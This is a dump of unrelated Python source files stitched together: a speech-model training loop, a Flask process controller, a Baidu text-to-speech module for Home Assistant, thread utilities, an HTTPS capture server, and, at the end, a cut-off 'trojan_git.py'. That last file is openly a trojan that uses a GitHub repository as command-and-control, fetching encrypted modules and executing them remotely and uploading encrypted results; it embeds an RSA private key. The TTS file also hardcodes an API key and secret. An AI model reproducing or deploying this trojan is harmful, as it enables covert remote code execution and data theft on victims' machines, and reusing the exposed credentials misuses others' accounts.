batch_size = _get_batch_size_from_config(config, to_do)
if processed_first:
shared_list = list()
p = read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, cfg_file, is_production, output_folder, wait_for_process=True
)
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(
shared_list
)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
else:
data_set_inp = data_set["input"]
data_set_ref = data_set["ref"]
data_end_index_fea = data_end_index["fea"]
data_end_index_lab = data_end_index["lab"]
shared_list = list()
data_loading_process = None
if not next_config_file is None:
data_loading_process = read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, next_config_file, is_production, output_folder, wait_for_process=False
)
nns, costs, optimizers, inp_out_dict = _load_model_and_optimizer(
fea_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do
)
if to_do == "forward":
post_file = _open_forward_output_files_and_get_file_handles(
forward_outs, require_decodings, info_file, output_folder
)
seq_model = is_sequential_dict(config, arch_dict)
N_snt, N_ex_tr, N_batches = _get_batch_config(data_set_inp, seq_model, to_do, data_name, batch_size)
beg_batch = 0
end_batch = batch_size
snt_index = 0
beg_snt_fea = 0
beg_snt_lab = 0
arr_snt_len_fea = shift(shift(data_end_index_fea, -1, 0) - data_end_index_fea, 1, 0)
arr_snt_len_lab = shift(shift(data_end_index_lab, -1, 0) - data_end_index_lab, 1, 0)
arr_snt_len_fea[0] = data_end_index_fea[0]
arr_snt_len_lab[0] = data_end_index_lab[0]
data_set_inp_dim, data_set_ref_dim = _get_dim_from_data_set(data_set_inp, data_set_ref)
inp_dim = data_set_inp_dim + data_set_ref_dim
loss_sum = 0
err_sum = 0
start_time = time.time()
for i in range(N_batches):
inp, ref, max_len_fea, max_len_lab, snt_len_fea, snt_len_lab, beg_snt_fea, beg_snt_lab, snt_index = _prepare_input(
snt_index,
batch_size,
data_set_inp_dim,
data_set_ref_dim,
beg_snt_fea,
beg_snt_lab,
data_end_index_fea,
data_end_index_lab,
beg_batch,
end_batch,
seq_model,
arr_snt_len_fea,
arr_snt_len_lab,
data_set_inp,
data_set_ref,
use_cuda,
)
if to_do == "train":
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
ref,
inp_out_dict,
max_len_fea,
max_len_lab,
batch_size,
to_do,
forward_outs,
)
_optimization_step(optimizers, outs_dict, config, arch_dict)
else:
with torch.no_grad():
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
ref,
inp_out_dict,
max_len_fea,
max_len_lab,
batch_size,
to_do,
forward_outs,
)
if to_do == "forward":
for out_id in range(len(forward_outs)):
out_save = outs_dict[forward_outs[out_id]].data.cpu().numpy()
if forward_normalize_post[out_id]:
counts = load_counts(forward_count_files[out_id])
out_save = out_save - np.log(counts / np.sum(counts))
write_mat(output_folder, post_file[forward_outs[out_id]], out_save, data_name[i])
else:
loss_sum = loss_sum + outs_dict["loss_final"].detach()
err_sum = err_sum + outs_dict["err_final"].detach()
beg_batch = end_batch
end_batch = beg_batch + batch_size
_update_progress_bar(to_do, i, N_batches, loss_sum)
elapsed_time_chunk = time.time() - start_time
loss_tot = loss_sum / N_batches
err_tot = err_sum / N_batches
del inp, ref, outs_dict, data_set_inp_dim, data_set_ref_dim
_save_model(to_do, nns, multi_gpu, optimizers, info_file, arch_dict)
if to_do == "forward":
for out_name in forward_outs:
post_file[out_name].close()
_write_info_file(info_file, to_do, loss_tot, err_tot, elapsed_time_chunk)
if not data_loading_process is None:
data_loading_process.join()
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(
shared_list
)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
data_set = {"input": data_set_inp, "ref": data_set_ref}
data_end_index = {"fea": data_end_index_fea, "lab": data_end_index_lab}
return [data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict]
else:
return [None, None, None, None, None, None]
def run_nn(
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, cfg_file, processed_first, next_config_file
):
# This function processes the current chunk using the information in cfg_file. In parallel, the next chunk is load into the CPU memory
# Reading chunk-specific cfg file (first argument-mandatory file)
if not (os.path.exists(cfg_file)):
sys.stderr.write("ERROR: The config file %s does not exist!\n" % (cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
# Setting torch seed
seed = int(config["exp"]["seed"])
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
# Reading config parameters
output_folder = config["exp"]["out_folder"]
use_cuda = strtobool(config["exp"]["use_cuda"])
gpu_id = config["exp"]["gpu_id"]
multi_gpu = strtobool(config["exp"]["multi_gpu"])
save_gpumem = strtobool(config["exp"]["save_gpumem"])
is_production = strtobool(config["exp"]["production"])
to_do = config["exp"]["to_do"]
info_file = config["exp"]["out_info"]
model = config["model"]["model"].split("\n")
forward_outs = config["forward"]["forward_out"].split(",")
forward_normalize_post = list(map(strtobool, config["forward"]["normalize_posteriors"].split(",")))
forward_count_files = config["forward"]["normalize_with_counts_from"].split(",")
require_decodings = list(map(strtobool, config["forward"]["require_decoding"].split(",")))
if to_do == "train":
batch_size = int(config["batches"]["batch_size_train"])
if to_do == "valid":
batch_size = int(config["batches"]["batch_size_valid"])
if to_do == "forward":
batch_size = 1
# set gpu id
if use_cuda:
torch.cuda.set_device(gpu_id)
torch.cuda.current_device()
# ***** Reading the Data********
if processed_first:
# Reading all the features and labels for this chunk
shared_list = []
p = threading.Thread(target=read_lab_fea, args=(cfg_file, is_production, shared_list, output_folder))
p.start()
p.join()
data_name = shared_list[0]
data_end_index = shared_list[1]
fea_dict = shared_list[2]
lab_dict = shared_list[3]
arch_dict = shared_list[4]
data_set = shared_list[5]
# converting numpy tensors into pytorch tensors and put them on GPUs if specified
if not (save_gpumem) and use_cuda:
data_set = torch.from_numpy(data_set).float().cuda()
else:
data_set = torch.from_numpy(data_set).float()
# Reading all the features and labels for the next chunk
shared_list = []
p = threading.Thread(target=read_lab_fea, args=(next_config_file, is_production, shared_list, output_folder))
p.start()
# Reading model and initialize networks
inp_out_dict = fea_dict
[nns, costs] = model_init(inp_out_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do)
# optimizers initialization
optimizers = optimizer_init(nns, config, arch_dict)
# pre-training and multi-gpu init
for net in nns.keys():
pt_file_arch = config[arch_dict[net][0]]["arch_pretrain_file"]
if pt_file_arch != "none":
if use_cuda:
checkpoint_load = torch.load(pt_file_arch)
else:
checkpoint_load = torch.load(pt_file_arch, map_location="cpu")
nns[net].load_state_dict(checkpoint_load["model_par"])
optimizers[net].load_state_dict(checkpoint_load["optimizer_par"])
optimizers[net].param_groups[0]["lr"] = float(
config[arch_dict[net][0]]["arch_lr"]
) # loading lr of the cfg file for pt
if multi_gpu:
nns[net] = torch.nn.DataParallel(nns[net])
if to_do == "forward":
post_file = {}
for out_id in range(len(forward_outs)):
if require_decodings[out_id]:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + "_to_decode.ark")
else:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + ".ark")
post_file[forward_outs[out_id]] = open_or_fd(out_file, output_folder, "wb")
# check automatically if the model is sequential
seq_model = is_sequential_dict(config, arch_dict)
# ***** Minibatch Processing loop********
if seq_model or to_do == "forward":
N_snt = len(data_name)
N_batches = int(N_snt / batch_size)
else:
N_ex_tr = data_set.shape[0]
N_batches = int(N_ex_tr / batch_size)
beg_batch = 0
end_batch = batch_size
snt_index = 0
beg_snt = 0
start_time = time.time()
# array of sentence lengths
arr_snt_len = shift(shift(data_end_index, -1, 0) - data_end_index, 1, 0)
arr_snt_len[0] = data_end_index[0]
loss_sum = 0
err_sum = 0
inp_dim = data_set.shape[1]
for i in range(N_batches):
max_len = 0
if seq_model:
max_len = int(max(arr_snt_len[snt_index : snt_index + batch_size]))
inp = torch.zeros(max_len, batch_size, inp_dim).contiguous()
for k in range(batch_size):
snt_len = data_end_index[snt_index] - beg_snt
N_zeros = max_len - snt_len
# Appending a random number of initial zeros, tge others are at the end.
N_zeros_left = random.randint(0, N_zeros)
# randomizing could have a regularization effect
inp[N_zeros_left : N_zeros_left + snt_len, k, :] = data_set[beg_snt : beg_snt + snt_len, :]
beg_snt = data_end_index[snt_index]
snt_index = snt_index + 1
else:
# features and labels for batch i
if to_do != "forward":
inp = data_set[beg_batch:end_batch, :].contiguous()
else:
snt_len = data_end_index[snt_index] - beg_snt
inp = data_set[beg_snt : beg_snt + snt_len, :].contiguous()
beg_snt = data_end_index[snt_index]
snt_index = snt_index + 1
# use cuda
if use_cuda:
inp = inp.cuda()
if to_do == "train":
# Forward input, with autograd graph active
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
inp_out_dict,
max_len,
batch_size,
to_do,
forward_outs,
)
for opt in optimizers.keys():
optimizers[opt].zero_grad()
outs_dict["loss_final"].backward()
# Gradient Clipping (th 0.1)
# for net in nns.keys():
# torch.nn.utils.clip_grad_norm_(nns[net].parameters(), 0.1)
for opt in optimizers.keys():
if not (strtobool(config[arch_dict[opt][0]]["arch_freeze"])):
optimizers[opt].step()
else:
with torch.no_grad(): # Forward input without autograd graph (save memory)
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
inp_out_dict,
max_len,
batch_size,
to_do,
forward_outs,
)
if to_do == "forward":
for out_id in range(len(forward_outs)):
out_save = outs_dict[forward_outs[out_id]].data.cpu().numpy()
if forward_normalize_post[out_id]:
# read the config file
counts = load_counts(forward_count_files[out_id])
out_save = out_save - np.log(counts / np.sum(counts))
# save the output
write_mat(output_folder, post_file[forward_outs[out_id]], out_save, data_name[i])
else:
loss_sum = loss_sum + outs_dict["loss_final"].detach()
err_sum = err_sum + outs_dict["err_final"].detach()
# update it to the next batch
beg_batch = end_batch
end_batch = beg_batch + batch_size
# Progress bar
if to_do == "train":
status_string = (
"Training | (Batch "
+ str(i + 1)
+ "/"
+ str(N_batches)
+ ")"
+ " | L:"
+ str(round(loss_sum.cpu().item() / (i + 1), 3))
)
if i == N_batches - 1:
status_string = "Training | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "valid":
status_string = "Validating | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "forward":
status_string = "Forwarding | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
progress(i, N_batches, status=status_string)
elapsed_time_chunk = time.time() - start_time
loss_tot = loss_sum / N_batches
err_tot = err_sum / N_batches
# clearing memory
del inp, outs_dict, data_set
# save the model
if to_do == "train":
for net in nns.keys():
checkpoint = {}
if multi_gpu:
checkpoint["model_par"] = nns[net].module.state_dict()
else:
checkpoint["model_par"] = nns[net].state_dict()
checkpoint["optimizer_par"] = optimizers[net].state_dict()
out_file = info_file.replace(".info", "_" + arch_dict[net][0] + ".pkl")
torch.save(checkpoint, out_file)
if to_do == "forward":
for out_name in forward_outs:
post_file[out_name].close()
# Write info file
with open(info_file, "w") as text_file:
text_file.write("[results]\n")
if to_do != "forward":
text_file.write("loss=%s\n" % loss_tot.cpu().numpy())
text_file.write("err=%s\n" % err_tot.cpu().numpy())
text_file.write("elapsed_time_chunk=%f\n" % elapsed_time_chunk)
text_file.close()
# Getting the data for the next chunk (read in parallel)
p.join()
data_name = shared_list[0]
data_end_index = shared_list[1]
fea_dict = shared_list[2]
lab_dict = shared_list[3]
arch_dict = shared_list[4]
data_set = shared_list[5]
# converting numpy tensors into pytorch tensors and put them on GPUs if specified
if not (save_gpumem) and use_cuda:
data_set = torch.from_numpy(data_set).float().cuda()
else:
data_set = torch.from_numpy(data_set).float()
return [data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict]
|
server.py
|
from flask import Flask , request , jsonify , make_response , render_template
from flask_cors import CORS
import requests
import json
import flask
import threading
import updateCore , getRunning , controlProcess
global pid
pid = -1
global tid
tid = -1
app = Flask(__name__)
CORS(app)
@app.route('/startprocess', methods=['POST', 'GET'])
def startProcess():
global pid
pid = str(request.get_json(silent=True, force=True))
print(pid)
startThread = threading.Thread(target=controlProcess.start, args = (pid,))
startThread.start()
return 'Success', 200
@app.route('/endprocess', methods=['POST'])
def endProcess():
endThread = threading.Thread(target=controlProcess.stop, args = ())
endThread.start()
pid = -1
return 'Success', 200
@app.route('/getrunning', methods=['POST'])
def getRun():
global pid
data = getRunning.main(pid)
print(data)
return jsonify({"data": data})
@app.route('/startthread', methods=['POST'])
def startThread():
global tid, pid
data = json.loads(request.data)
tid = str(data["data"])
rr = str(data["rr"])
startThread = threading.Thread(target=updateCore.start, args = (pid, tid, rr))
startThread.start()
return "Success", 200
@app.route('/endthread', methods=['POST'])
def endThread():
global tid
print("STOP Called")
updateCore.stop()
tid = -1
return "Success", 200
@app.route('/')
def main():
return render_template("index.html")
if __name__ == "__main__":
app.run(use_reloader = True, port = 4000, debug=True)
|
api_tts.py
|
import os, hashlib, asyncio, threading, time, aiohttp, json, urllib
from mutagen.mp3 import MP3
from homeassistant.helpers import template
from homeassistant.const import (STATE_IDLE, STATE_PAUSED, STATE_PLAYING, STATE_OFF, STATE_UNAVAILABLE)
from .api_config import ROOT_PATH, ApiConfig
# 百度TTS
IS_PY3 = True
from urllib.request import urlopen
from urllib.request import Request
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.parse import quote_plus
API_KEY = '4E1BG9lTnlSeIf1NQFlrSq6h'
SECRET_KEY = '544ca4657ba8002e3dea3ac2f5fdd241'
# 发音人选择, 基础音库:0为度小美,1为度小宇,3为度逍遥,4为度丫丫,
# 精品音库:5为度小娇,103为度米朵,106为度博文,110为度小童,111为度小萌,默认为度小美
PER = 4
# 语速,取值0-15,默认为5中语速
SPD = 5
# 音调,取值0-15,默认为5中语调
PIT = 5
# 音量,取值0-9,默认为5中音量
VOL = 5
# 下载的文件格式, 3:mp3(default) 4: pcm-16k 5: pcm-8k 6. wav
AUE = 3
FORMATS = {3: "mp3", 4: "pcm", 5: "pcm", 6: "wav"}
FORMAT = FORMATS[AUE]
CUID = "123456PYTHON"
TTS_URL = 'http://tsn.baidu.com/text2audio'
class DemoError(Exception):
pass
""" TOKEN start """
TOKEN_URL = 'http://openapi.baidu.com/oauth/2.0/token'
SCOPE = 'audio_tts_post' # 有此scope表示有tts能力,没有请在网页里勾选
def fetch_token():
print("fetch token begin")
params = {'grant_type': 'client_credentials',
'client_id': API_KEY,
'client_secret': SECRET_KEY}
post_data = urlencode(params)
if (IS_PY3):
post_data = post_data.encode('utf-8')
req = Request(TOKEN_URL, post_data)
try:
f = urlopen(req, timeout=5)
result_str = f.read()
except URLError as err:
print('token http response http code : ' + str(err.code))
result_str = err.read()
if (IS_PY3):
result_str = result_str.decode()
print(result_str)
result = json.loads(result_str)
print(result)
if ('access_token' in result.keys() and 'scope' in result.keys()):
if not SCOPE in result['scope'].split(' '):
raise DemoError('scope is not correct')
print('SUCCESS WITH TOKEN: %s ; EXPIRES IN SECONDS: %s' % (result['access_token'], result['expires_in']))
return result['access_token']
else:
raise DemoError('MAYBE API_KEY or SECRET_KEY not correct: access_token or scope not found in token response')
""" TOKEN end """
class ApiTTS():
def __init__(self, media, cfg):
self.hass = media._hass
self.media = media
self.media_position = None
self.media_url = None
self.thread = None
self.tts_before_message = cfg['tts_before_message']
self.tts_after_message = cfg['tts_after_message']
tts_mode = cfg['tts_mode']
if [1, 2, 3, 4].count(tts_mode) == 0:
tts_mode = 4
self.tts_mode = tts_mode
# TTS音量
self.tts_volume = 0
self.api_config = ApiConfig(os.path.join(os.path.dirname(__file__), 'dist/cache'))
def log(self, name,value):
self.media.log('【文本转语音】%s:%s',name,value)
# 异步进行TTS逻辑
def async_tts(self, text):
# 如果当前正在播放,则暂停当前播放,保存当前播放进度
if self.media._media_player != None and self.media.state == STATE_PLAYING:
self.media.media_pause()
self.media_position = self.media.media_position
self.media_url = self.media.media_url
# 播放当前文字内容
self.play_url(text)
# 恢复当前播放到保存的进度
if self.media_url != None:
self.log('恢复当前播放URL', self.media_url)
self.media._media_player.load(self.media_url)
time.sleep(2)
self.log('恢复当前进度', self.media_position)
self.media._media_player.seek(self.media_position)
self.media_url = None
# 获取语音URL
def play_url(self, text):
# 生成文件名
f_name = self.api_config.md5(text + str(self.tts_mode)) + ".mp3"
# 创建目录名称
_dir = self.api_config.get_path('tts')
self.api_config.mkdir(_dir)
# 生成缓存文件名称
ob_name = _dir + '/' + f_name
self.log('本地文件路径', ob_name)
# 文件不存在,则获取下载
if os.path.isfile(ob_name) == False:
token = fetch_token()
tex = quote_plus(text) # 此处TEXT需要两次urlencode
print(tex)
per = [1,0,3,4][self.tts_mode - 1]
params = {'tok': token, 'tex': tex, 'per': per, 'spd': SPD, 'pit': PIT, 'vol': VOL, 'aue': AUE, 'cuid': CUID,
'lan': 'zh', 'ctp': 1} # lan ctp 固定参数
data = urlencode(params)
urllib.request.urlretrieve(TTS_URL + '?' + data, ob_name)
else:
# 如果没有下载,则延时1秒
time.sleep(1)
# 生成播放地址
local_url = self.hass.config.api.deprecated_base_url + ROOT_PATH + '/cache/tts/' + f_name
self.log('本地URL', local_url)
if self.media._media_player != None:
self.media._media_player.is_tts = True
# 保存当前音量
volume_level = self.media.volume_level
# 如果设置的TTS音量不为0,则改变音量
if self.tts_volume > 0:
print('设置TTS音量:%s'%(self.tts_volume))
self.media._media_player.set_volume_level(self.tts_volume / 100)
self.media._media_player.load(local_url)
# 计算当前文件时长,设置超时播放时间
audio = MP3(ob_name)
self.log('音频时长', audio.info.length)
time.sleep(audio.info.length + 2)
self.media._media_player.is_tts = False
# 恢复音量
print('恢复音量:%s'%(volume_level))
self.media._media_player.set_volume_level(volume_level)
async def speak(self, call):
try:
text = call.data['message']
# 解析模板
tpl = template.Template(text, self.hass)
text = self.tts_before_message + tpl.async_render(None) + self.tts_after_message
self.log('解析后的内容', text)
if self.thread != None:
self.thread.join()
self.thread = threading.Thread(target=self.async_tts, args=(text,))
self.thread.start()
except Exception as ex:
self.log('出现异常', ex)
# 清除缓存
async def clear(self, call):
try:
_path = self.api_config.get_path('tts')
self.api_config.delete(_path)
except Exception as ex:
self.log('出现异常', ex)
|
SimComponent.py
|
import time
# import ACS__POA
# from ACS import CBDescIn
from Acspy.Clients.SimpleClient import PySimpleClient
import random
from utils import HMILog
import threading
# acs client
client = PySimpleClient()
# get the components
t1_double = client.getComponent("TEST_JAVA_T1")
t2_double = client.getComponent("TEST_JAVA_T2")
class SimComp:
def __init__(self, site_type):
self.log = HMILog(title=__name__)
self.log.info([['y', " - SimComp - "], ['g', site_type]])
t = threading.Thread(target=self.sim_loop)
# set the thread to daemon for quicker termination
t.daemon = True
t.start()
return
def sim_loop(self):
"""
changes the values on the properties every second
"""
while True:
# every second set a random value on the property
t1_double.doubleRWProp.set_sync(random.random())
t2_double.doubleRWProp.set_sync(random.random())
time.sleep(1)
|
ithread.py
|
"""
Copyright (c) 2017, Syslog777
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Desktop nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from threading import Thread
class IThread:
def __init__(self, list):
try:
for func in list:
self.thread = Thread(target=func)
self.thread.start()
print("{} spawned".format(self.thread.getName()))
except BaseException as e:
print(e)
|
httpserver.py
|
import sys
if sys.version_info < (3, 0):
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer as OriginalHTTPServer
else:
from http.server import HTTPServer as OriginalHTTPServer, SimpleHTTPRequestHandler
from scriptcore.encoding.encoding import Encoding
import os.path
import ssl
import threading
from time import sleep
class HttpServer(object):
def __init__(self, host='0.0.0.0', port=18888):
"""
Initiate the server object
:param host: The host
:type host: str
:param port: The port
:type port: int
"""
self.host = host
self.port = port
self._server = None
self._thread = None
self._data = []
def start(self):
"""
Start the server
"""
if self._thread:
return False
self._data = []
self._server = HTTPServer((self.host, self.port), HttpServerHandler)
dir_path = os.path.dirname(os.path.realpath(__file__))
key_file = os.path.join(dir_path, 'httpserver-cert.key')
cert_file = os.path.join(dir_path, 'httpserver-cert.crt')
self._server.socket = ssl.wrap_socket(self._server.socket,
keyfile=key_file,
certfile=cert_file,
server_side=True)
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.start()
return True
def stop(self):
"""
Stop the server
"""
if not self._thread:
return False
sleep(0.01)
self._data = self._server.data
self._server.shutdown()
self._thread = None
self._server = None
return True
def get_data(self):
"""
Get the data
"""
if self._server:
sleep(0.01)
return self._server.data
else:
return self._data
class HTTPServer(OriginalHTTPServer, object):
def __init__(self, *args, **kwargs):
"""
Initiate the server
"""
super(HTTPServer, self).__init__(*args, **kwargs)
self.data = []
class HttpServerHandler(SimpleHTTPRequestHandler, object):
def do_POST(self):
f = self.send_head()
data = Encoding.normalize(self.rfile.read(int(self.headers['Content-Length'])))
self.server.data.append(data)
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
|
Main.py
|
import Bot
import MQTT
import Thinkspeak
import threading
a = threading.Thread(target=Bot.main)
b = threading.Thread(target=MQTT.main)
c = threading.Thread(target=Thinkspeak.main)
b.start()
c.start()
a.start()
|
test.py
|
# import multiprocessing
# import time
#
# def test1():
# while True:
# print("test1---1---")
# time.sleep(1)
# def test2():
# while True:
# print("test2---2---")
# time.sleep(1)
#
# def main():
# p1 = multiprocessing.Process(target=test1) #创建进程对象
# p2 = multiprocessing.Process(target=test2)
# p1.start() #创建启动子进程
# p2.start()
# if __name__ == "__main__":
# main()
def test(*s):
print("---",s)
test() #()
test(1) #(1,)
test(1,2) #(1,2)
test(1,2,3) #(1,2,3)
def test2(**s):
print("+-+",s)
test2() #{}
test2(name="dog") #{'name': 'dog'}
test2(name="dog",man="people") # {'name': 'dog', 'man': 'people'}
test2(name="dog",man="people",girl="gold") #{'name': 'dog', 'man': 'people', 'girl': 'gold'}
if(1):
a =10
print(a)
|
trojan_git.py
|
#!/usr/bin/python
import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
import github3
import lib_crypto as RSA
# -------- Configuration ---------- #
VERBOSE=False
code_private_key="""-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4BI+2xzBqLJivdx0i5zm85o+s6tCqU04sV1dDnKksZXgdb3I
hbsGR3DQh3zjfbu9dPregI9hNq6z53uvOYTu/SRPQlcJwHujWpCUIUGP4c3qk/R8
s2Oegq1jBznCazrwZ5QpMyBf3Yu4aYw9FUrqwxkW9kc7jXhUB8eMCKttkUcCEbHH
dIKkBK/6LuQOrHCn/9gFOOymRYQdlk5MDXx9vDTXiqMTuE8Sk7M2s8WKOysrX2yX
VF0TQrkBnibslrsMFjJgus2M8+la3sx6zBDDDlQIxnsU9Le7Z2J4eHMqzBfSRc/8
l4LAPtlXQg8Ju6OSqipRzW4lpnqYb60ieGaorwIDAQABAoIBADRcrymfD7ZvcVmy
8d1KXkIhEnQEGoDb1drE2aEts0T4pEp/fiOaL/5z45c13Sedvslecq6SUwJnUw1O
PwVvBjZLzOXQ1yuO+P6J+MPIwWngJ+hJYva82ebpw9GFcuSCEnnyCqqy7xQjuYWY
yxF1v2S2MUJ+JPGLY/+pZxUDkog3IsV/2HBLI/LX3TYUYwzkFHpCejGmXsSbOjeN
CQRuReGr+vHkOnlAzsLDrp4/VZZoebJEV5DFH32AAIj07kOKY4extsz5mm7LWpig
NAYREhftJLHwpGcF/NgAByME2tRu5yv4aSJFGRrAZJG4xpCD7xNAtjpYSHgfWrmx
pGestIkCgYEA5sEUujMM2Ap6Otbpgcg8Cx6vkJ7iYz0maU1/PyneUp19itXWmEQt
xRAd2EmT3X++AsUICRCDJNaIcPi8Cb5pmFstt///Q/1zg48+UryP2XDfaErknkst
YQLRJiAnv00nSGsGOjwhOj4sWp31BDUuuj1s1gekVKRSZpXE5N9c9R0CgYEA+JX9
YpHrZ2qXoiAsAn992sWYPfkPHn4gtjolHBNrcq442iw+7Zi/1WtWoO1yLuJn/eHZ
/GLDguWv/N0oCV3dfpglMjiVj+FrPJ/k3cnZEXLPXZ5q4VBKBE6488AVB513gdVP
96KRqIGYWrs/PhYJEd+QPjD14ci94sTKCKdx5zsCgYA8IZh7JQ51xdUwPAzBayJq
a2aosx6fabH2wuEj3o82zB+I7ExthWa/8YE1eYb0s3MaWanMYucp1FXdypOFnn75
2tjBGA628vcFE3DUMprxuL4e+VU2ArUikI9b9gklir9v2aPXzQ+Dk+wO+RZ+MDWr
BpKz+23ROLjYTrLuSV556QKBgQC+uQVhXSdJfyS7xQc/G2YKNdQqqC4LbSXX6iCS
u+uSX01LRus5DBsSuXoLmmIiyp6S0XeYBoaOpX8y+NNA7H2GJWFUeMl3TLIkH2FP
MRCULIwg/exu1lUTnPqWOWdpIk2QlYL3MgmjSVsFMejBz9JBnk9jB9l+06+sjuOb
ZC0mBQKBgEivm/d5OfCiCBXSuqD0/KMVQKHKsIAg7f/1xgM58tlBryT9M6o6FqWY
XplsAj8W62HHViXuit3tOcRq92D+PHJIJlEAJZG+VZ5jEIIEJYzEe72x8m7D9E85
3MuWeRQ6uDZAYTvWmyZ33H/YHhEhelu4QPioNvR4FXPJtuwjFKUM
-----END RSA PRIVATE KEY-----"""
# -------- Variabels ---------- #
trojan_id = ""
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_module = []
configured = False
config = None
task_queue = Queue.Queue()
data_public_key=""
code_public_key=""
class GitImporter(object):
def __init__(self):
self.current_module_code=""
def find_module(self, fullname, path=None):
if configured:
print "[*] Attemtping to retrieve %s" % fullname
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
def random_hex_string():
hex_string = str(hex(random.randint(0x10000000,0xFFFFFFFF))).upper()[2:10]
return hex_string
def connect_to_github():
gh = login(username="username", password="password")
repo = gh.repository("username","trojan")
branch = repo.branch("master")
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filepath.path:
print "[*] Found file %s" % filepath
blob = repo.blob(filename._json_data['sha']).content.read()
content = RSA.decrypt(blob, code_private_key, VERBOSE)
return content
return None
def get_trojan_config():
global configured
global config
# Search for remote config file
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if trojan_id in filename.path:
configured = True
# If not found generate and save
if not configured:
generate_trojan_config(gh, repo, branch)
# Load config file
trojan_config = "config/%s.json" % trojan_id
config_json = get_file_contents(trojan_config)
config = json.load(base64.b64decode(config_json))
configured = True
for task in config:
if 'module' in task:
if task['module'] not in sys.modules:
exec ("import %s" % task['module'])
return config
def generate_trojan_config(gh, repo, branch):
global configured
config_json = "config/%s.json" % trojan_id
# Generate default config file
buffer_json = get_file_contents("config/default_config.json")
buffer = base64.b64decode(buffer_json)
print "[*] Generated configuration: %s" % config_json
commit_message = "Generated configuration: %s" % config_json
# Save config file in config folders
repo.create_file(config_json,commit_message,base64.b64encode(RSA.encrypt_string(buffer,code_public_key, VERBOSE)))
return True
def check_trojan_id():
global trojan_id
global configured
configured = False
found_id = False
# Check for ID file
for file in os.listdir("."):
if "id" in file:
found_id = True
if found_id:
with open('id') as file_object:
trojan_id = file_object.read().rstrip()
print "[*] Found ID (%s)" % trojan_id
file_object.close()
else:
# Generate and save ID
trojan_id = random_hex_string()
print "[*] Generating and saving ID (%s)" % trojan_id
with open('id', 'w') as file_object:
file_object.write("%s" % trojan_id)
file_object.close()
return trojan_id
def store_module_result(data):
global data_public_key
gh, repo, branch = connect_to_github()
data_public_key=get_file_contents("/config/data_key.pub")
data = RSA.encrypt_string(data, data_public_key, VERBOSE)
tm_year = time.gmtime(time.time())[0]
tm_mon = time.gmtime(time.time())[1]
tm_mday = time.gmtime(time.time())[2]
tm_hour = time.gmtime(time.time())[3]
tm_min = time.gmtime(time.time())[4]
tm_sec = time.gmtime(time.time())[5]
date = "%s-%s-%s_%s-%s-%s" % (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec)
